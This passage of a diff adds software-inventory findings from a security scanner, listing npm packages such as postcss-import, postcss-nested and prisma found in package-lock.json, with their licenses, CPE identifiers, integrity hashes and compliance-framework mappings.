+ "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f6953879c586ae44", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: postcss-import 15.1.0", + "title": "postcss-import 15.1.0", + "description": "Package discovered: postcss-import 15.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9f2c64d652651310", + "name": "postcss-import", + "version": "15.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:postcss-import:postcss-import:15.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-import:postcss_import:15.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_import:postcss-import:15.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_import:postcss_import:15.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss-import:15.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss_import:15.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/postcss-import@15.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/postcss-import/-/postcss-import-15.1.0.tgz", + "integrity": "sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew==", + "dependencies": { + "postcss-value-parser": "^4.0.0", + "read-cache": "^1.0.0", + "resolve": "^1.1.7" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "49a05cdffa8a7ef9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: postcss-js 4.1.0", + "title": "postcss-js 4.1.0", + "description": "Package discovered: postcss-js 4.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9feba814d6f9cb30", + "name": "postcss-js", + "version": "4.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:postcss-js:postcss-js:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-js:postcss_js:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_js:postcss-js:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_js:postcss_js:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss-js:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss_js:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/postcss-js@4.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/postcss-js/-/postcss-js-4.1.0.tgz", + "integrity": "sha512-oIAOTqgIo7q2EOwbhb8UalYePMvYoIeRY2YKntdpFQXNosSu3vLrniGgmH9OKs/qAkfoj5oB3le/7mINW1LCfw==", + "dependencies": { + "camelcase-css": "^2.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "92ac10dec31ee632", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: postcss-load-config 6.0.1", + "title": "postcss-load-config 6.0.1", + "description": "Package discovered: postcss-load-config 6.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "07fb83a013bf4ef4", + "name": "postcss-load-config", + "version": "6.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:postcss-load-config:postcss-load-config:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-load-config:postcss_load_config:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_load_config:postcss-load-config:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_load_config:postcss_load_config:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-load:postcss-load-config:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-load:postcss_load_config:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_load:postcss-load-config:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_load:postcss_load_config:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss-load-config:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss_load_config:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/postcss-load-config@6.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-6.0.1.tgz", + "integrity": "sha512-oPtTM4oerL+UXmx+93ytZVN82RrlY/wPUV8IeDxFrzIjXOLF1pN+EmKPLbubvKHT2HC20xXsCAH2Z+CKV6Oz/g==", + "dependencies": { + "lilconfig": "^3.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a302d705f049e265", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: postcss-nested 6.2.0", + "title": "postcss-nested 6.2.0", + "description": "Package discovered: postcss-nested 6.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "16f11e75cb882477", + "name": "postcss-nested", + "version": "6.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:postcss-nested:postcss-nested:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-nested:postcss_nested:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_nested:postcss-nested:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_nested:postcss_nested:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss-nested:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss_nested:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/postcss-nested@6.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/postcss-nested/-/postcss-nested-6.2.0.tgz", + "integrity": "sha512-HQbt28KulC5AJzG+cZtj9kvKB93CFCdLvog1WFLf1D+xmMvPGlBstkpTEZfK5+AN9hfJocyBFCNiqyS48bpgzQ==", + "dependencies": { + "postcss-selector-parser": "^6.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "002cf57b0b0dcab6", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: postcss-selector-parser 6.1.2", + "title": "postcss-selector-parser 6.1.2", + "description": "Package discovered: postcss-selector-parser 6.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f7f4c134629f3b3a", + "name": "postcss-selector-parser", + "version": "6.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:postcss-selector-parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-selector-parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_selector_parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_selector_parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/postcss-selector-parser@6.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.1.2.tgz", + "integrity": "sha512-Q8qQfPiZ+THO/3ZrOrO0cJJKfpYCagtMUkXbnEfmgUjwXg6z/WBeOyS9APBBPCTSiDV+s4SwQGu8yFsiMRIudg==", + "dependencies": { + "cssesc": "^3.0.0", + "util-deprecate": "^1.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "738a4e319226bde2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: postcss-value-parser 4.2.0", + "title": "postcss-value-parser 4.2.0", + "description": "Package discovered: postcss-value-parser 4.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d70570520f43a33c", + "name": "postcss-value-parser", + "version": "4.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:postcss-value-parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-value-parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_value_parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_value_parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-value:postcss-value-parser:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss-value:postcss_value_parser:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_value:postcss-value-parser:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss_value:postcss_value_parser:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss-value-parser:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:postcss:postcss_value_parser:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/postcss-value-parser@4.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz", + "integrity": "sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f330341278522955", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: prisma 5.22.0", + "title": "prisma 5.22.0", + "description": "Package discovered: prisma 5.22.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f76e4353403c9c3d", + "name": "prisma", + "version": "5.22.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:prisma:prisma:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/prisma@5.22.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/prisma/-/prisma-5.22.0.tgz", + "integrity": "sha512-vtpjW3XuYCSnMsNVBjLMNkTj6OZbudcPPTPYHqX0CJfpcdWciI1dM8uHETwmDxxiqEwCIE6WvXucWUetJgfu/A==", + "dependencies": { + "@prisma/engines": "5.22.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9fc67df1307075e9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: process-nextick-args 2.0.1", + "title": "process-nextick-args 2.0.1", + "description": "Package discovered: process-nextick-args 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "da765da41b164754", + "name": "process-nextick-args", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": 